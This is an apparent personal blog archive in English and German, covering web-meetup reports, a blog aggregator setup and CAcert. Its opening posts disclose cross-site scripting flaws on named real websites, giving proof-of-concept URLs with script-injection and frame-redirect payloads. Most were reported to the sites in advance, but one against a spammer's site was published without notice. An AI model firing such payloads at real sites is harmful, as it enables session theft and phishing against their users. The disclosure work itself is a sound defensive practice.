It's terrifying how many sites there are out there with XSS-issues.

http://www.netbeat.de/bestellen/domaincheck.html?<script>alert(1)</script>
http://www.netbeat.de/support/kommentare.html?name="><script>alert(1)</script>
http://www.symlink.ch/users.pl?unickname="><script>alert(1)</script>
http://www.stuttgart.de/sde/search.php?search=%22><script>alert%281%29</script>
http://www.holidayranking.de/search.html?searchSearchString="><script>alert(1)</script>
http://www.freecity.de/suche/index.phtml?gosearch=yes&words="><script>alert(1)</script>
http://search.netdoktor.com/results.html?qt="><script>alert(1)</script>&la=de
http://www.vfb.de/de/suche/index.php?words="><script>alert(1)</script>
http://www.dvd.de/dvd-and-date/alledvd.asp?strTxt="><script>alert(1)</script>

Note: All have been informed more than a week ago. I also had a bunch of others that got fixed after notification of the webmasters.

Napster and MPAA still unfixed.

Folgende Nachricht schrieb ich an den Support von Napster (das ist dieser DRM-Shop, hervorgegangen aus dem Label eines längst vergessenen Projekts):

Folgende, überaus kompetente Antwort erhielt ich:

Ich wusste doch immer dass die von der Filmindustrie das mit dem Internetz nicht verstanden haben:

Note: This is just a short form of a german article I posted today. E-Plus is a big german mobile telephony provider. I've found a bunch of XSS together with Alexander Brachmann (responsible disclosure, all reported to E-Plus before, probably more to come).

For my english visitors, here are the urls:
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script>
http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus.de/frame.asp?go=');alert('

Already fixed ones:
http://www.eplus.de/frame.asp?go=http://www.google.de/
http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de
http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com

Von XSS (Cross Site Scripting) spricht man, wenn es durch Usereingaben möglich ist, bei einer Seite eigenen HTML und JavaScript-Code einzufügen. Das ist insbesondere dann ein Problem, wenn die Seite (auf der selben Domain reicht) in irgendeiner Weise Sessions und Accounts nutzt. Warum? Weil es trivial möglich ist, mit etwas JavaScript-Code das Session-Cookie zu übertragen und somit den Account zu hijacken.

Ein simples Beispiel:
http://www.eplus.de/meta/shopsuche/suche_ausgabe.asp?suchwort="><script>alert(1)</script>

Durch die bloße Eingabe von "><script>alert(1)</script> oder <script>alert(1)</script> lässt sich jedes Formular auf triviale XSS-Probleme checken (einfach mal ausprobieren).

Problemfall Frames: Aufgrund der Tatsache, dass ein bestimmter Framezustand nicht in einer URL festhaltbar ist, haben sich viele Menschen mehr oder weniger sinnvolle Fakes ausgedacht, die dann häufig in der Form http://mydomain.com/framescript?location=siteinframe daherkommen.
Nun kann man sowas ausnutzen, um in einem Frame eine Fremdseite darzustellen. Bis vor kurzem funktionierte dies noch:
http://www.eplus-unternehmen.de/frame.asp?go=http://www.google.de/
Kurze Zeit später wurde selbiges gefiltert, mit folgendem kam man aber immer noch weiter:
http://www.eplus.de/frame.asp?go=http://www.eplus.de@www.google.de
http://www.eplus.de/frame.asp?go=http://www.eplus.dedomain.com
http://www.eplus.de/frame.asp?go=http://www.eplus.de.mydomain.com
Gehen inzwischen alle nicht mehr.
Problem? Phishing. Funktioniert selbiges bei einer Bank oder einem sonstigen Unternehmen, bei dem größere Beträge eine Rolle spielen, ist es für Phisher attraktiv, unbedarften Menschen eine Nachricht zu schicken, die eine echt aussehende URL des Unternehmens enthält.

Was bei obriger URL nach wie vor funktioniert, ist eine etwas trickreichere JavaScript-Injection:
http://www.eplus.de/frame.asp?go=http://www.eplus.de/');alert(1);document.write('
http://www.eplus.de/frame.asp?go=');alert('
Das schöne hierbei ist, dass die Variable direkt in bereits bestehenden JavaScript-Code eingefügt wird.

Desweiteren hat eplus noch mehr Domains und anderswo funktioniert es noch:
http://www.eplus-unlimited.de/3_1_jingles/index.jsp?toLoad=http://www.google.de//

E-Plus wurde vor über einem Monat mit den ersten Lücken kontaktiert. Die Schließung erfolgte schleppend, weswegen mir die Veröffentlichung hier angemessen erscheint. Die Veröffentlichung wurde vor einer Woche angekündigt. Es wurden keine Lücken publiziert, von denen E-Plus nicht schon mindestens vor einer Woche bescheid wusste.

Credits gehen vor allem an Alexander Brachmann.

In aller Regel betreibe ich Responsible Disclosure: Vor einer öffentlichen Publizierung wird der Anbieter oder Autor der Software mit Vorlauf informiert.

Heut abend beim Webmontag gibt's ne Kurz-Präsentation.

Ich hab zwar keine Ahnung, was OKTE ist oder was die anbieten, aber die haben mir gerade Spam geschickt.

Sidenote:
okte.cn/user.asp?n="><script>alert(1)</script>

(Copy & Paste bitte, ich hoffe, dass das so deren Pagerank nicht positiv beeinflußt)

No responsible disclosure for spammers!

Now, if you've been on the internet a bit longer, you may remember those sites at the end of the 90s telling you that they're »best viewed with a resolution of 1024x768 and the Microsoft Internet Explorer version 6.0". Luckily, most of those pages disappeared with the upcoming success of Mozilla Firefox and others (oh, there are still some, e. g. the cinema in my home town, but ie6 runs on wine).

As you may know, I'm a happy KDE user and have been using Konqueror as my everyday browser for some time now. Recently, I discovered more and more pages I couldn't use any more. I had to start this thing called Firefox. I don't like it, but that is not the point here.
I even noticed today that ebay has a new interface that konqueror doens't like.

This is a result of the more and more upcoming AJAX/JavaScript-stuff, which is often nice, I saw a lot of well designed web applications lately (ok, I saw a lot of crap, too). I'm not enough into JavaScript to know if it's the lack of support by Konqueror or the pages. I just hope that people will come together and find solutions for that. I remember that there was some discussion about using webcore (the khtml-fork used by apples safari) for konqueror, don't know if that would make it better, maybe some users of this drm-crippled system could comment on that.

Die Linkliste auf andere Blogs in meiner Sidebar war mir schon länger ein Dorn im Auge. Irgendwie unflexibel, immer entscheiden, wer jetzt wichtig genug dafür ist, was tun mit Blogs, die nur selten bedient werden. Die naheliegende Variante: Linkliste wird durch ein Planet ersetzt, die obersten Einträge erscheinen in der Sidebar. Hat den Vorteil, dass diejenigen öfters verlinkt werden, die mehr schreiben.
Da mir die originale Planet-Software immer weniger gefallen hat (viel zu oft mysteriöse Ereignisse, plötzlich tauchen uralt-Einträge wieder auf, die alle anderen von oben verdrängen), betreibt Harvester selbigen. Gefällt mir auf den ersten Blick tendenziell besser als Planet, ist in Ruby geschrieben und braucht in der jüngsten Version eine Datenbank als Backend. Upstream sieht hierfür PostgreSQL vor, Bernd hat dankenswerter Weise einen Patch für MySQL geschrieben.
Ein Problem ist im Moment noch, dass jeder HTML-Fehler und insbesondere auch in XHTML 1.1 nicht mehr existente HTML-Kommandos und Entities ständig dazu führen, dass mein Blog nicht mehr validiert. Muss ich mal schaun, im Prinzip kann man ja HTML-Tags rausstrippen und Entities, sowie non-Unicode-Zeichen in UTF-8 konvertieren.

Wer sich nun fragt, warum sein Feed nicht auftaucht, dafür kommen tendenziell folgende Varianten in Frage:
1. Feed kaputt/validiert nicht. Mag Harvester garnicht. Lösung: lynx --source [feed-url] | xmllint --noout - und fixen.
2. Ich kenn Dein Blog nicht. Fix: In den Comments melden.
3. Ich habs vergessen/verpeilt/irgendwann in den endlosen weiten meines Feedreaders verloren gegangen: Try 2.
4. Ich finde Dein Blog langweilig. Vermutlich nicht fixbar.

Zu guter letzt und da ich schon drauf angeprochen worden bin: Aufgeführt im Planet impliziert nicht zwingend inhaltliche Übereinstimmung mit den Schreibenden.

Als nächstes steht dann eine scuttle-basierte Linkliste an.

Heute (naja, gestern) wieder Webmontag in Karlsruhe im Kubik. Es gab drei Vorträge, einer davon von mir (ich hab das Gefühl, dass meine Vortragsroutine langsam besser wird), Slides wie immer als OpenDocument und als PDF. Die Leute waren heute sehr diskutierfreudig, weswegen es deutlich länger als geplant ging. Zwar musste natürlich irgendwann der Einwand »Businessmodel« kommen (ich glaub da schreib ich mal was längeres zu), aber insgesamt war's ganz in Ordnung.

Anschließend MNT über Simple Sharing Extensions, scheint ne interessante Sache zu sein, die evtl. einige der Probleme lösen könnte, über die ich mir auch schon Gedanken gemacht hab (wie verknüpf ich indizierte RSS-Elemente wieder mit ihrem Ursprung). Achja: Es ist zwar von Microsoft, aber die Dokumente als CC veröffentlicht.
Problem scheint im Moment zu sein, dass es keine Software dafür gibt.

Dritter und letzter Oliver Gassner, der sich am Begriff (oder, wie er meinte, nicht-Begriff) Web 2.0 störte, weil dieser völlig undefinierbar und unbrauchbar sei. Ich würde jetzt mal wagen, dem vorsichtig zu widersprechen, dass man schon grob einkreisen kann, worum es sich bei Web 2.0 dreht: Im weitesten Sinne offene Kommunikation mit Interaktionsmöglichkeiten, die die Möglichkeit zum reinen Lesen/Konsumieren bietet, aber dem Nutzer auf Wunsch irgendeine Art von Interaktion ermöglicht. Zwar hat Oliver einige Dinge mehr noch erwähnt, die angeblich Web 2.0 seien (Pay per click, kontextsensitive Werbung) und damit nix zu tun haben, ich fand aber unklar, wieso er die jetzt zu Web 2.0 mitzählen will. Alles, was ich allgemein drunter verstehen würde, hat schon dieses Interaktionsmerkmal zu eigen.

Im Anschluss beim Socialing hatten wir noch ne kleine Runde über CAcert (nächstes Mal gibt's glaub von mir dazu n ausführlichen Vortrag, scheint ja doch großes Interesse zu wecken) und eine etwas hitzigere Diskussion über Linux auf dem Desktop. Dabei hab ich gemerkt, dass ich mir in jüngerer Zeit angewöhnt hab, auch die Linux 9.0-Fraktion freundlich zu behandeln.

Thanks to yetzt, I finally have a hackergotchi for various planets. If you are publishing the content of this blog in some planet, feel free to add it.

Um circa halb zehn fiel es mir heute ein: Da war doch noch was Montag abend. Viel zu spät trudelte ich also beim zweiten Karlsruher Webmontag ein. Vorträge waren natürlich sämtliche schon vorbei, dafür aber noch einiges an interessantem Socialing.

Der Webmontag fand diesmal im Kubik statt, ein von einem Verein betriebenes Cafe. Sowohl was Atmosphäre, als auch Preise und technische Ausstattung anging deutlich angenehmer als das Mal zuvor, insofern meine Stimme für zukünfige Webmontage im Kubik.

Seit einigen Tagen am Start: Planet Karlsruhe, was ausgebaut werden soll zu einer möglichst vollständigen Sammlung Karlsruher Blogs.

Die bisher eingetragenen haben sich entweder bei mir gemeldet oder ihr Blog steht unter Creative Commons. Frei lizensierte Blogs trage ich ungefragt ein, alle anderen mögen mir bitte per Mail mitteilen, wenn sie aufgenommen werden möchten.

planet is a famous python software to combine the feeds of various blogs (or other feed-sources) to one website. It's used by various free software projects, organizations etc.

While thinking about creating a planet karlsruhe, I thought about possible licensing/copyright problems, in theory you would have to ask everyone you aggregate. As there are many blogs using free or semi-free licenses like FDL or Creative Commons that at least allow re-distributing unchanged content if you stick with the license, adding license-data would make it perfectly legal to add those feeds without asking.

planet is already flexible enough to do this, as you can just add additional variables. Change the config.ini to something like this:

[http://www.hboeck.de/feeds/atom.xml]
name = Hanno Böck
license_name = Creative Commons by-sa
license_link = http://creativecommons.org/licenses/by-sa/2.5/

Add some Code to the template:

<TMPL_IF channel_license_name>
<TMPL_IF channel_license_link><a href="<TMPL_VAR channel_license_link ESCAPE="HTML">"></TMPL_IF>
<TMPL_VAR channel_license_name ESCAPE="HTML">
<TMPL_IF channel_license_link></a></TMPL_IF>
</TMPL_IF>

And you're done.

Seit gestern hat auch Karlsruhe einen Webmontag, welcher im Restaurant Stadtmitte stattfand, welches von unserer Anwesenheit aufgrund wohl mangelhafter Absprachen unter den Mitarbeitern etwas überrascht war.

Lediglich vier Kurzvorträge wurden aufgeboten, davon einer von mir selbst mit einigen Gedanken zu SSL und Webanwendungen (Slides hier). Das könnte hoffentlich nächstes Mal etwas mehr werden.
Mein eigener Vortrag löste vor allem Rückfragen bzgl. CAcert aus, es würde sich als anbieten, den nächsten Webmontag mit CAcert-Punkteverteilung zu verbinden.

Angesichts des doch recht großen Interesses und der offensichtlich ziemlich hohen Blogger-Dichte in Karlsruhe würde ich mal anregen, einen Planet Karlsruhe einzurichten. Die von Lars betriebene Plattform planetplanet.de würde sich hierzu anbieten, ich werde das mal in die Wege leiten.
Um der Formalia zwecks Urheberrechten gerecht zu werden, bitte ich alle Karlsruher Blogger, die damit einverstanden sind, auf einem Planet indiziert zu werden, mich samt URL + Feed-URL zu kontakten.

Update: Nächster Webmontag bereits in Planung für den 3. Juli.

I usually don't like to do too much blogging about my blog, but I recently installed two new features I find worth mentioning.

One is that I have installed the serendipity calendar plugin, which you can see on the right (if you aren't reading rss). It'll contain events I find interesting/worth mentioning and will probably visit and maybe write reports about. It's a bit limited, it doesn't support more detailed time information (events longer than a day, time etc.), it shows the days till the event, but not for the first one, which I don't understand yet why. Maybe I'll hack a bit on it.

The other thing is that this blog is now available on IPv6 and there also with a correct, CAcert-signed ssl-certificate. So you can now read my blog secure ;-)
CAcert is a noncommercial certification authority based on a web-of-trust mechanism and I suggest you install their root-cert in your browser.